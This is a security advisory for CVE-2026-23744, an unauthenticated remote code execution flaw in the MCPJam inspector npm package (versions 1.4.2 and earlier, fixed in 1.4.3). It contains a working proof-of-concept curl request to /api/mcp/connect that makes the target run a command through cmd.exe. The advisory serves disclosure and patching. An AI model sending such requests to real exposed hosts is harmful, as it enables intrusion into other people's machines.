GHSA-232V-J27C-5PP6
Vulnerability from github – Published: 2026-01-16 21:15 – Updated: 2026-01-16 21:57Summary
MCPJam inspector is the local-first development platform for MCP servers. The Latest version Versions 1.4.2 and earlier are vulnerable to remote code execution (RCE) vulnerability, which allows an attacker to send a crafted HTTP request that triggers the installation of an MCP server, leading to RCE.
This vulnerability is similar to CVE-2025-49596, but more severe. While CVE-2025-49596 requires tricking a user into clicking a malicious link, this vulnerability is exploitable with no user interaction. Since MCPJam inspector by default listens on 0.0.0.0 instead of 127.0.0.1, an attacker can trigger the RCE remotely via a simple HTTP request.
Details
MCPJam inspector binds to 0.0.0.0 making its HTTP APIs remotely reachable.
const server = serve({
fetch: app.fetch,
port: SERVER_PORT,
hostname: "0.0.0.0",
});
The /api/mcp/connect API, which is intended for connecting to MCP servers, becomes an open entry point for unauthorized requests. When an HTTP request reaches the /connect route, the system extracts the command and args fields without performing any security checks, leading to the execution of arbitrary command.
PoC
(1) Start up the MCPJam inspector as Github README
npx @mcpjam/inspector@latest
(2) RCE by posting a HTTP request
A remote code execution (RCE) attack can be triggered by sending a simple HTTP request to the target host running MCPJam inspector (e.g., http://10.97.58.83:6274 in the test environment).
curl http://10.97.58.83:6274/api/mcp/connect --header "Content-Type: application/json" --data "{\"serverConfig\":{\"command\":\"cmd.exe\",\"args\":[\"/c\", \"calc\"],\"env\":{}},\"serverId\":\"mytest\"}"
Impact
Remote Code Execution (RCE)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.4.2"
},
"package": {
"ecosystem": "npm",
"name": "@mcpjam/inspector"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.4.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-23744"
],
"database_specific": {
"cwe_ids": [
"CWE-306"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-16T21:15:35Z",
"nvd_published_at": "2026-01-16T20:15:51Z",
"severity": "CRITICAL"
},
"details": "### Summary\nMCPJam inspector is the local-first development platform for MCP servers. The Latest version Versions 1.4.2 and earlier are vulnerable to remote code execution (RCE) vulnerability, which allows an attacker to send a crafted HTTP request that triggers the installation of an MCP server, leading to RCE.\n\nThis vulnerability is similar to CVE-2025-49596, but more severe. While CVE-2025-49596 requires tricking a user into clicking a malicious link, this vulnerability is exploitable with no user interaction. Since MCPJam inspector by default listens on 0.0.0.0 instead of 127.0.0.1, an attacker can trigger the RCE remotely via a simple HTTP request.\n\n\n\n### Details\nMCPJam inspector binds to `0.0.0.0` making its HTTP APIs remotely reachable.\n``` TypeScript\nconst server = serve({\n fetch: app.fetch,\n port: SERVER_PORT,\n hostname: \"0.0.0.0\",\n});\n```\n\nThe `/api/mcp/connect` API, which is intended for connecting to MCP servers, becomes an open entry point for unauthorized requests. When an HTTP request reaches the `/connect` route, the system extracts the `command` and `args` fields without performing any security checks, leading to the execution of arbitrary command.\n\n### PoC\n(1) Start up the MCPJam inspector as Github README\n`npx @mcpjam/inspector@latest`\n\n(2) RCE by posting a HTTP request\nA remote code execution (RCE) attack can be triggered by sending a simple HTTP request to the target host running MCPJam inspector (e.g., http://10.97.58.83:6274 in the test environment).\n`curl http://10.97.58.83:6274/api/mcp/connect --header \"Content-Type: application/json\" --data \"{\\\"serverConfig\\\":{\\\"command\\\":\\\"cmd.exe\\\",\\\"args\\\":[\\\"/c\\\", \\\"calc\\\"],\\\"env\\\":{}},\\\"serverId\\\":\\\"mytest\\\"}\"`\n\n\n\u003cimg width=\"1669\" height=\"1397\" alt=\"image\" src=\"https://github.com/user-attachments/assets/cb6505f1-3cdd-4c64-8f39-a01619a63411\" /\u003e\n\n\n### Impact\nRemote Code Execution (RCE)",
"id": "GHSA-232v-j27c-5pp6",
"modified": "2026-01-16T21:57:08Z",
"published": "2026-01-16T21:15:35Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/MCPJam/inspector/security/advisories/GHSA-232v-j27c-5pp6"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23744"
},
{
"type": "WEB",
"url": "https://github.com/MCPJam/inspector/commit/e6b9cf9d9e6c9cbec31493b1bdca3a1255fe3e7a"
},
{
"type": "PACKAGE",
"url": "https://github.com/MCPJam/inspector"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "REC in MCPJam inspector due to HTTP Endpoint exposes"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.